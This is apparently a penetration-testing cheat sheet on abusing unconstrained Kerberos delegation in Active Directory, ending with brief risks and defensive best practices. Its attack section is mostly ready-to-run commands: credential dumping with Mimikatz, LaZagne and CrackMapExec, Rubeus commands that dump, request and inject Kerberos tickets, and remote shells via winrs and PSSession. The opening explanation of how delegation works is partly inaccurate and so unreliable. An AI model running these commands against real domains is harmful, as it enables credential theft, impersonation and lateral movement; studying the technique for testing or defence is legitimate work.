AD DS - UnConstrained Delegation

Here is a brief explanation of unconstrained delegation in Active Directory:

Unconstrained delegation is a feature in Active Directory that allows a service account to impersonate any user on the network. When a service account is configured for unconstrained delegation, it can access resources on behalf of any user without needing their password.

How it works:

• A user authenticates to the service and receives a ticket-granting ticket (TGT) from the domain controller.

• The service uses the TGT to request a service ticket for itself from the domain controller by presenting the user's TGT. This is known as a credential delegation request.

• If the service account has unconstrained delegation enabled, the domain controller issues a service ticket for any resource on the network to the service.

• The service can now access any resource the user has access to by presenting the service ticket issued by the domain controller.

Abusing Unconstrained Delegation

Detection:

# AD-Module
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

# PowerView
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
Get-DomainComputer -Unconstrained | select -ExpandProperty

# ADSearch.exe
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

Attack:

# First you need to dump hashes with a tool like mimikatz, LaZagne or CrackMapExec
LaZagne.exe all
Mimikatz.exe sekurlsa::logonpasswords
cme smb -u 'Administrator' -p '@dminPassw0rd' --sam

# After you have retrieved the local admin hash you can perform the attack
# All you need is a TGT ticket from the user or machine that has unconstrained delegation set
# My prefered tool for the rest of the attack is Rubeus.exe

1. Obtain the TGT
Rubeus.exe triage #This will list all the current TGT's available. If one for the current user is not there we can asktgt
Rubeus.exe dump /luid:x0347 /nowrap # This will get the TGT from triage
Rubeus.exe asktgt /user:username /rc4:41968434196465316847321984879 /nowrap # This will attempt to obatain a TGT from the DC

2. Inject the TGT into our current session using PTT(pass-the-ticket)
#simply copy and paste the base64 encoded ticket into the command below.
Rubeus.exe ptt /ticket:doIFXasdf548a796dfs674a96sd.....

3. You should be able to winrs or pssession into the new machine now.
winrs -r:machine.company.local cmd
Enter-PSSession -ComputerName machine.company.local

Risks:

• Unconstrained delegation gives very broad access to the service account. If compromised, it can allow an attacker to impersonate any user on the network.

• It can be abused to gain unauthorized access to resources and escalate privileges.

• It is recommended to avoid unconstrained delegation where possible, and instead use constrained delegation which allows access to only specified services.

Best practices:

• Audit service accounts enabled for unconstrained delegation and limit its use.

• Monitor account usage to detect misuse.

• Use privileged access management to control the accounts.

• Implement authentication policies like Kerberos Armoring to prevent ticket misuse.